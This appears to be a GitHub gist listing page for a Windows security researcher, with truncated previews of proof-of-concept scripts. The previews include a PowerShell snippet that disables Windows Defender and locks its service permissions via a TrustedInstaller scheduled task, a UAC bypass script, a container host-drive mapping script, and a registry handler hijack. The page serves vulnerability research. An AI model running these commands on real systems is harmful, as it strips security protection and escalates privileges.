James Forshaw tyranid
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
tyranid
/ bypass_uac.ps1
Last active
February 16, 2024 08:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Powershell script to bypass UAC on Vista+ assuming | |
| # there exists one elevated process on the same desktop. | |
| # Technical details in: | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
| # You need to Install-Module NtObjectManager for this to run. | |
| Import-Module NtObjectManager |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Param( | |
| [Parameter(Mandatory, Position = 0)] | |
| [string]$HostDrive, | |
| [Parameter(Mandatory, Position = 1)] | |
| [string]$LocalDrive | |
| ) | |
| # Script to map a host drive inside a Windows Docker Server Container | |
| # You need to be an admin in the container for this to work. | |
| # Use as .\map_host_drive C: X: |
tyranid
/ kill_file_locker.ps1
Created
September 26, 2017 18:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module NtObjectManager | |
| <# | |
| Function to kill all processes which are using a locked file. | |
| #> | |
| function Kill-FileLocker { | |
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <tchar.h> | |
| #include <Windows.h> | |
| #include <string> | |
| int _tmain(int argc, _TCHAR* argv[]) | |
| { | |
| for (int i = 1; i < 128; ++i) | |
| { | |
| std::wstring name = L".\a"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command] | |
| @="c:\\windows\\system32\\calc.exe" |
tyranid
/ Test for MS14-027
Created
May 22, 2014 01:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <tchar.h> | |
| #include <Windows.h> | |
| int wmain(int argc, WCHAR* argv[]) | |
| { | |
| if (argc < 2) | |
| { | |
| printf("Usage: ImpersonateSHExec filename [sessionid]\n"); | |
| return 1; |